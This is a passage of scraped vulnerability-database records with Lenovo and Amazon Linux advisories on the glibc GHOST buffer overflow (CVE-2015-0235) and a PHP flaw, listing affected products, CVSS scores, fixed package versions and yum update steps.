C30 \n(type 1136, 1137) | Not affected \nThinkStation D30 \n(type 4223, 4228, 4229) | Not affected \nThinkStation D30 \n(type 4353, 4354) | Not affected \nThinkStation E31 | Not affected \nThinkStation E32 | Not affected \nThinkStation P300 | Not affected \nThinkStation P500 | Not affected \nThinkStation P700 | Not affected \nThinkStation P900 | Not affected \nThinkStation S30 | Not affected \nThinkStation S30 | Not affected \n \nThinkServer & Storage\n\nSystem | Status | Minimum version \nincluding Fix | Link \n---|---|---|--- \nThinkServer RD330 | Not affected | \u2212 | \u2212 \nThinkServer RD340 | Not affected | \u2212 | \u2212 \nThinkServer RD350 | Affected | 1.33 | <http://support1.lenovo.com.cn/lenovo/wsi/Modules/DriverDetailServer.aspx?ID=70692> \nThinkServer RD430 | Not affected | \u2212 | \u2212 \nThinkServer RD440 | Not affected | \u2212 | \u2212 \nThinkServer RD450 | Affected | 1.33 | <http://support1.lenovo.com.cn/lenovo/wsi/Modules/DriverDetailServer.aspx?ID=70693> \nThinkServer RD530 | Not affected | \u2212 | \u2212 \nThinkServer RD540 | Not affected | \u2212 | \u2212 \nThinkServer RD550 | Affected | 1.33 | <http://support1.lenovo.com.cn/lenovo/wsi/Modules/DriverDetailServer.aspx?ID=70694> \nThinkServer RD630 | Not affected | \u2212 | \u2212 \nThinkServer RD640 | Not affected | \u2212 | \u2212 \nThinkServer RD650 | Affected | 1.33 | <http://support1.lenovo.com.cn/lenovo/wsi/Modules/DriverDetailServer.aspx?ID=70695> \nThinkServer RS140 | Not affected | \u2212 | \u2212 \nThinkServer TD340 | Not affected | \u2212 | \u2212 \nThinkServer TD350 | Affected | 1.33 | <http://support1.lenovo.com.cn/lenovo/wsi/Modules/DriverDetailServer.aspx?ID=70696> \nThinkServer TS130 | Not affected | \u2212 | \u2212 \nThinkServer TS140 | Not affected | \u2212 | \u2212 \nThinkServer TS430 | Not affected | \u2212 | \u2212 \nThinkServer TS440 | Not affected | \u2212 | \u2212 \nThinkStorage SA120 | Not affected | \u2212 | \u2212 \n \nLenovo EMC\n\nSystem | Status \n---|--- \nLenovoEMC EZ Media & Backup (hm3) | Not affected \nLenovoEMC Home Media Cloud Edition (hm2) | Not affected \nLenovoEMC ix12-300r | Not affected \nLenovoEMC ix2 (inc DL) | Not affected \nLenovoEMC ix2-200 | Not affected \nLenovoEMC ix2-200 Cloud Edition | Not affected \nLenovoEMC ix4-200d | Not affected \nLenovoEMC ix4-200d (2.1.x firmware) | Not affected \nLenovoEMC ix4-200d Cloud Edition | Not affected \nLenovoEMC ix4-300d (inc DL) | Not affected \nLenovoEMC px12-350r | Not affected \nLenovoEMC px12-400r | Not affected \nLenovoEMC px12-450r | Not affected \nLenovoEMC px2-300d (inc NVR) | Not affected \nLenovoEMC px4-300d (inc NVR) | Not affected \nLenovoEMC px4-300r | Not affected \nLenovoEMC px4-400d (inc NVR) | Not affected \nLenovoEMC px4-400r | Not affected \nLenovoEMC px6-300d | Not affected \n \nSoftware\n\nApplication | Status \n---|--- \nDeploy Manager | Not affected \nDiagnostic | Not affected \nEasy Manager | Not affected \nEasy Updater | Not affected \nEnergy manager | Not affected \nOSPUT | Not affected \nPartner Pack | Not affected \nPower Planner | Not affected \nTSMCLI | Not affected \n \n**Acknowledgements:**\n\n**Other information and references:**\n\n * CERT Vulnerability Note: [VU#967332](<http://www.kb.cert.org/vuls/id/967332>)\n * CVE ID: [CVE-2015-0235](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0235>)\n\n**Revision History:**\n\n**Revision ** | **Date** | **Description ** \n---|---|--- \n1.2 | 2015-06-29 | Publish additional fixes \n1.1 | 2015-03-03 | Publish additional fixes \n1.0 | 2015-02-16 | Initial release\n", "cvss3": {}, "published": "2016-07-22T00:00:00", "type": "lenovo", "title": "GNU C Library (glibc) __nss_hostname_digits_dots() function vulnerable to buffer overflow (", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-0235"], "modified": "2016-07-22T06:46:07", "id": "LENOVO:PS500043-GNU-C-LIBRARY-GLIBC-__NSS_HOSTNAME_DIGITS_DOTS-FUNCTION-VULNERABLE-TO-BUFFER-OVERFLOW-GHOST-NOSID", "href": "https://support.lenovo.com/us/en/product_security/ps500043-gnu-c-library-glibc-__nss_hostname_digits_dots-function-vulnerable-to-buffer-overflow-ghost", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-02-21T17:01:58", "description": "**Lenovo Security Advisory:** LEN-2015-007 \n \n**Potential Impact:** Execution of Arbitrary Code \n \n**Severity:** High \n \n**Summary:** \nA vulnerability has been found in the GNU C Library (glibc) __nss_hostname_digits_dots() function that allows both local and remote users to cause a buffer overflow in network function calls gethostbyname() and gethostbyname2(). The media is referring to this vulnerability as \u201cGHOST.\u201d \n \nImmediate patches are required to fix the vulnerability in the glibc that allow arbitrary code execution from unauthenticated users. It is necessary to restart computers or process following the patches. \n \n**Description:** \nAccording to Qualys, the vulnerability is \"a buffer overflow in the _ __nss_hostname_digits_dots()_ function of the GNU C Library (_glibc_). This bug is reachable both locally and remotely via the _gethostbyname*()_ functions\" and furthermore, \"arbitrary code execution can be achieved\" by use of the buffer overflow. The vulnerability exists in any systems relying on the function in the GNU C Library gethostbyname() and gethostbyname2() functions. There is currently proof of concept code available to exploit this code.\n\n**Affected Products:**\n\nThinkPad\n\nSystem | Status \n---|--- \nThinkPad Edge E130 | Not affected \nThinkPad Edge E145 | Not affected \nThinkPad Edge E431/E531 | Not affected \nThinkPad Edge E440/E540 | Not affected \nThinkPad Edge E455/E555 | Not affected \nThinkPad Edge S430 | Not affected \nThinkPad Helix | Not affected \nThinkPad L430/L530 | Not affected \nThinkPad L440/L540 | Not affected \nThinkPad S1 Yoga (Non-vPro) | Not affected \nThinkPad S1 Yoga (vPro) | Not affected \nThinkPad S431 | Not affected \nThinkPad S440 | Not affected \nThinkPad S531 | Not affected \nThinkPad S540 | Not affected \nThinkPad T430 | Not affected \nThinkPad T430s | Not affected \nThinkPad T430u | Not affected \nThinkPad T431s | Not affected \nThinkPad T440/T440s | Not affected \nThinkPad T440p | Not affected \nThinkPad T530 | Not affected \nThinkPad T540p | Not affected \nThinkPad Tablet 10 (32-bit) | Not affected \nThinkPad Tablet 10 (64-bit) | Not affected \nThinkPad Tablet 2 | Not affected \nThinkPad Tablet 8 (32-bit) | Not affected \nThinkPad Tablet 8 (64-bit) | Not affected \nThinkPad Twist/Edge S230 | Not affected \nThinkPad W530 | Not affected \nThinkPad W540 | Not affected \nThinkPad X1 Carbon (20A7,20A8) | Not affected \nThinkPad X1 Carbon (34xx) | Not affected \nThinkPad X131e (AMD) | Not affected \nThinkPad X131e (Intel) | Not affected \nThinkPad X140e (AMD) | Not affected \nThinkPad X230 | Not affected \nThinkPad X230s | Not affected \nThinkPad X230t | Not affected \nThinkPad X240/X240s | Not affected \nThinkPad Yoga 11e | Not affected \n \nThinkCentre\n\nSystem | Status \n---|--- \nThinkCentre E73Z | Not affected \nThinkCentre E93 | Not affected \nThinkCentre E93Z | Not affected \nThinkCentre Edge 62z | Not affected \nThinkCentre Edge 72 | Not affected \nThinkCentre Edge 72z | Not affected \nThinkCentre Edge 92z | Not affected \nThinkCentre M62Z | Not affected \nThinkCentre M72e | Not affected \nThinkCentre M72e | Not affected \nThinkCentre M72e | Not affected \nThinkCentre M72z | Not affected \nThinkCentre M73 | Not affected \nThinkCentre M73 Tiny | Not affected \nThinkCentre M73Z | Not affected \nThinkCentre M78 (type 1562, 1565, 1662, 1663, 1766, 2111, 2113, 2114, 4860, 4863, 4865, 4866, 5100) | Not affected \nThinkCentre M78 (type 10BN, 10BQ, 10BR, 10BS, 10BT, 10BU) | Not affected \nThinkCentre M83 | Not affected \nThinkCentre M83Z | Not affected \nThinkCentre M90 | Not affected \nThinkCentre M90p | Not affected \nThinkCentre M91 | Not affected \nThinkCentre M91P | Not affected \nThinkCentre M92 | Not affected \nThinkCentre M92P | Not affected \nThinkCentre M92Z | Not affected \nThinkCentre M93 | Not affected \nThinkCentre M93P | Not affected \nThinkCentre M93Z | Not affected \n \nThinkStation\n\nSystem | Status \n---|--- \nThinkStation C30 \n(type 1095, 1096, 1097) | Not affected \nThinkStation C30 \n(type 1136, 1137) | Not affected \nThinkStation D30 \n(type 4223, 4228, 4229) | Not affected \nThinkStation D30 \n(type 4353, 4354) | Not affected \nThinkStation E31 | Not affected \nThinkStation E32 | Not affected \nThinkStation P300 | Not affected \nThinkStation P500 | Not affected \nThinkStation P700 | Not affected \nThinkStation P900 | Not affected \nThinkStation S30 | Not affected \nThinkStation S30 | Not affected \n \nThinkServer & Storage\n\nSystem | Status | Minimum version \nincluding Fix | Link \n---|---|---|--- \nThinkServer RD330 | Not affected | \u2212 | \u2212 \nThinkServer RD340 | Not affected | \u2212 | \u2212 \nThinkServer RD350 | Affected | 1.33 | <http://support1.lenovo.com.cn/lenovo/wsi/Modules/DriverDetailServer.aspx?ID=70692> \nThinkServer RD430 | Not affected | \u2212 | \u2212 \nThinkServer RD440 | Not affected | \u2212 | \u2212 \nThinkServer RD450 | Affected | 1.33 | <http://support1.lenovo.com.cn/lenovo/wsi/Modules/DriverDetailServer.aspx?ID=70693> \nThinkServer RD530 | Not affected | \u2212 | \u2212 \nThinkServer RD540 | Not affected | \u2212 | \u2212 \nThinkServer RD550 | Affected | 1.33 | <http://support1.lenovo.com.cn/lenovo/wsi/Modules/DriverDetailServer.aspx?ID=70694> \nThinkServer RD630 | Not affected | \u2212 | \u2212 \nThinkServer RD640 | Not affected | \u2212 | \u2212 \nThinkServer RD650 | Affected | 1.33 | <http://support1.lenovo.com.cn/lenovo/wsi/Modules/DriverDetailServer.aspx?ID=70695> \nThinkServer RS140 | Not affected | \u2212 | \u2212 \nThinkServer TD340 | Not affected | \u2212 | \u2212 \nThinkServer TD350 | Affected | 1.33 | <http://support1.lenovo.com.cn/lenovo/wsi/Modules/DriverDetailServer.aspx?ID=70696> \nThinkServer TS130 | Not affected | \u2212 | \u2212 \nThinkServer TS140 | Not affected | \u2212 | \u2212 \nThinkServer TS430 | Not affected | \u2212 | \u2212 \nThinkServer TS440 | Not affected | \u2212 | \u2212 \nThinkStorage SA120 | Not affected | \u2212 | \u2212 \n \nLenovo EMC\n\nSystem | Status \n---|--- \nLenovoEMC EZ Media & Backup (hm3) | Not affected \nLenovoEMC Home Media Cloud Edition (hm2) | Not affected \nLenovoEMC ix12-300r | Not affected \nLenovoEMC ix2 (inc DL) | Not affected \nLenovoEMC ix2-200 | Not affected \nLenovoEMC ix2-200 Cloud Edition | Not affected \nLenovoEMC ix4-200d | Not affected \nLenovoEMC ix4-200d (2.1.x firmware) | Not affected \nLenovoEMC ix4-200d Cloud Edition | Not affected \nLenovoEMC ix4-300d (inc DL) | Not affected \nLenovoEMC px12-350r | Not affected \nLenovoEMC px12-400r | Not affected \nLenovoEMC px12-450r | Not affected \nLenovoEMC px2-300d (inc NVR) | Not affected \nLenovoEMC px4-300d (inc NVR) | Not affected \nLenovoEMC px4-300r | Not affected \nLenovoEMC px4-400d (inc NVR) | Not affected \nLenovoEMC px4-400r | Not affected \nLenovoEMC px6-300d | Not affected \n \nSoftware\n\nApplication | Status \n---|--- \nDeploy Manager | Not affected \nDiagnostic | Not affected \nEasy Manager | Not affected \nEasy Updater | Not affected \nEnergy manager | Not affected \nOSPUT | Not affected \nPartner Pack | Not affected \nPower Planner | Not affected \nTSMCLI | Not affected \n \n**Acknowledgements:**\n\n**Other information and references:**\n\n * CERT Vulnerability Note: [VU#967332](<http://www.kb.cert.org/vuls/id/967332>)\n * CVE ID: [CVE-2015-0235](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0235>)\n\n**Revision History:**\n\n**Revision ** | **Date** | **Description ** \n---|---|--- \n1.2 | 2015-06-29 | Publish additional fixes \n1.1 | 2015-03-03 | Publish additional fixes \n1.0 | 2015-02-16 | Initial release\n", "cvss3": {}, "published": "2016-07-22T00:00:00", "type": "lenovo", "title": "GNU C Library (glibc) __nss_hostname_digits_dots() function vulnerable to buffer overflow (\"GHOST\")", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2016-07-22T00:00:00", "id": "LENOVO:PS500043-NOSID", "href": "https://support.lenovo.com/us/en/product_security/ghost", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "amazon": [{"lastseen": "2023-02-08T17:21:58", "description": "**Issue Overview:**\n\nA heap-based buffer overflow was found in glibc's __nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application.\n\n<br/><h4>Special notes:</h4>\n\nBecause of the exceptional nature of this security event, we have backfilled our 2014.03 and 2013.09 Amazon Linux AMI repositories with new glibc packages that fix CVE-2015-0235.\n\nFor 2014.09 Amazon Linux AMIs, <i>glibc-2.17-55.93.amzn1</i> addresses the CVE. Running <i>yum clean all</i> followed by <i>yum update glibc</i> will install the fixed package, and you should reboot your instance after installing the update.\n\nFor Amazon Linux AMIs <a href=\"https://aws.amazon.com/amazon-linux-ami/faqs/#lock\">\"locked\"</a> to the 2014.03 repositories, the same <i>glibc-2.17-55.93.amzn1</i> addresses the CVE. Running <i>yum clean all</i> followed by <i>yum update glibc</i> will install the fixed package, and you should reboot your instance after installing the update.\n\nFor Amazon Linux AMIs <a href=\"https://aws.amazon.com/amazon-linux-ami/faqs/#lock\">\"locked\"</a> to the 2013.09 repositories, <i>glibc-2.12-1.149.49.amzn1</i> addresses the CVE. Running <i>yum clean all</i> followed by <i>yum update glibc</i> will install the fixed package, and you should reboot your instance after installing the update.\n\nFor Amazon Linux AMIs <a href=\"https://aws.amazon.com/amazon-linux-ami/faqs/#lock\">\"locked\"</a> to the 2013.03, 2012.09, 2012.03, or 2011.09 repositories, run <i>yum clean all</i> followed by <i>yum --releasever=2013.09 update glibc</i> to install the updated glibc package. You should reboot your instance after installing the update.\n\nIf you are using a pre-2011.09 Amazon Linux AMI, then you are using a version of the Amazon Linux AMI that was part of our public beta, and we encourage you to move to a newer version of the Amazon Linux AMI as soon as possible.\n\n \n**Affected Packages:** \n\n\nglibc\n\n \n**Issue Correction:** \nRun _yum update glibc_ to update your system. Note that you may need to run _yum clean all_ first. Once this update has been applied, _reboot your instance to ensure that all processes and daemons that link against glibc are using the updated version_. On new instance launches, you should still reboot after cloud-init has [automatically applied](<https://aws.amazon.com/amazon-linux-ami/faqs/#auto_update>) this update.\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 glibc-static-2.17-55.93.amzn1.i686 \n \u00a0\u00a0\u00a0 glibc-common-2.17-55.93.amzn1.i686 \n \u00a0\u00a0\u00a0 nscd-2.17-55.93.amzn1.i686 \n \u00a0\u00a0\u00a0 glibc-devel-2.17-55.93.amzn1.i686 \n \u00a0\u00a0\u00a0 glibc-2.17-55.93.amzn1.i686 \n \u00a0\u00a0\u00a0 glibc-utils-2.17-55.93.amzn1.i686 \n \u00a0\u00a0\u00a0 glibc-debuginfo-2.17-55.93.amzn1.i686 \n \u00a0\u00a0\u00a0 glibc-headers-2.17-55.93.amzn1.i686 \n \u00a0\u00a0\u00a0 glibc-debuginfo-common-2.17-55.93.amzn1.i686 \n \n src: \n \u00a0\u00a0\u00a0 glibc-2.17-55.93.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 glibc-utils-2.17-55.93.amzn1.x86_64 \n \u00a0\u00a0\u00a0 nscd-2.17-55.93.amzn1.x86_64 \n \u00a0\u00a0\u00a0 glibc-debuginfo-2.17-55.93.amzn1.x86_64 \n \u00a0\u00a0\u00a0 glibc-headers-2.17-55.93.amzn1.x86_64 \n \u00a0\u00a0\u00a0 glibc-debuginfo-common-2.17-55.93.amzn1.x86_64 \n \u00a0\u00a0\u00a0 glibc-common-2.17-55.93.amzn1.x86_64 \n \u00a0\u00a0\u00a0 glibc-static-2.17-55.93.amzn1.x86_64 \n \u00a0\u00a0\u00a0 glibc-2.17-55.93.amzn1.x86_64 \n \u00a0\u00a0\u00a0 glibc-devel-2.17-55.93.amzn1.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2015-0235](<https://access.redhat.com/security/cve/CVE-2015-0235>)\n\nMitre: [CVE-2015-0235](<https://vulners.com/cve/CVE-2015-0235>)\n", "cvss3": {}, "published": "2015-01-27T11:41:00", "type": "amazon", "title": "Critical: glibc", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2015-01-28T19:57:00", "id": "ALAS-2015-473", "href": "https://alas.aws.amazon.com/ALAS-2015-473.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-08T17:21:40", "description": "**Issue Overview:**\n\nA heap-based buffer overflow was found in glibc's __nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nA use-after-free flaw was found in the unserialize() function of PHP's DateTimeZone implementation. A malicious script author could possibly use this flaw to disclose certain portions of server memory. (CVE-2015-0273)\n\n \n**Affected Packages:** \n\n\nphp55\n\n \n**Issue Correction:** \nRun _yum update php55_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 php55-gd-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-process-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-soap-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-pgsql-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-cli-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-odbc-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-imap-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-mssql-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-opcache-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-devel-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-bcmath-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-dba-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-mysqlnd-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-xml-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-mcrypt-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-recode-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-common-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-tidy-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-enchant-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-fpm-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-ldap-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-snmp-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-intl-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-pspell-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-pdo-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-xmlrpc-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-mbstring-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-embedded-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-debuginfo-5.5.22-1.98.amzn1.i686 \n \u00a0\u00a0\u00a0 php55-gmp-5.5.22-1.98.amzn1.i686 \n \n src: \n \u00a0\u00a0\u00a0 php55-5.5.22-1.98.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 php55-pspell-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-dba-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-snmp-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-odbc-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-xml-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-mssql-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-debuginfo-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-tidy-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-opcache-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-recode-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-process-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-xmlrpc-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-mysqlnd-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-embedded-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-imap-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-gmp-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-ldap-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-bcmath-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-soap-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-pgsql-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-enchant-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-gd-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-cli-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-fpm-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-common-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-pdo-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-mbstring-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-mcrypt-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-devel-5.5.22-1.98.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php55-intl-5.5.22-1.98.amzn1.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2015-0235](<https://access.redhat.com/security/cve/CVE-2015-0235>), [CVE-2015-0273](<https://access.redhat.com/security/cve/CVE-2015-0273>)\n\nMitre: [CVE-2015-0235](<https://vulners.com/cve/CVE-2015-0235>), [CVE-2015-0273](<https://vulners.com/cve/CVE-2015-0273>)\n", "cvss3": {}, "published": "2015-03-23T08:29:00", "type": "amazon", "title": "Critical: php55", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235", "CVE-2015-0273"], "modified": "2015-03-23T08:54:00", "id": "ALAS-2015-494", "href": "https://alas.aws.amazon.com/ALAS-2015-494.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-08T17:21:41", "description": "**Issue Overview:**\n\nA heap-based buffer overflow was found in glibc's __nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nUse after free vulnerability was reported in PHP DateTimeZone. (CVE-2015-0273)\n\n \n**Affected Packages:** \n\n\nphp54\n\n \n**Issue Correction:** \nRun _yum update php54_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 php54-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-pspell-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-mcrypt-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-debuginfo-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-common-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-mysql-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-soap-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-mssql-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-mbstring-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-tidy-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-enchant-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-mysqlnd-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-xml-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-pgsql-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-fpm-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-cli-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-imap-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-intl-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-process-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-snmp-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-devel-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-bcmath-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-recode-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-dba-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-ldap-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-embedded-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-gd-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-pdo-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-xmlrpc-5.4.38-1.66.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-odbc-5.4.38-1.66.amzn1.i686 \n \n src: \n \u00a0\u00a0\u00a0 php54-5.4.38-1.66.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 php54-ldap-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-dba-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-pspell-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-common-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-devel-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-pdo-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-mcrypt-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-mysql-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-recode-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-enchant-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-mssql-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-intl-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-odbc-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-bcmath-5.4.38-1.66.amzn1.x86_64 \n \u00a0\u00a0\u00a0 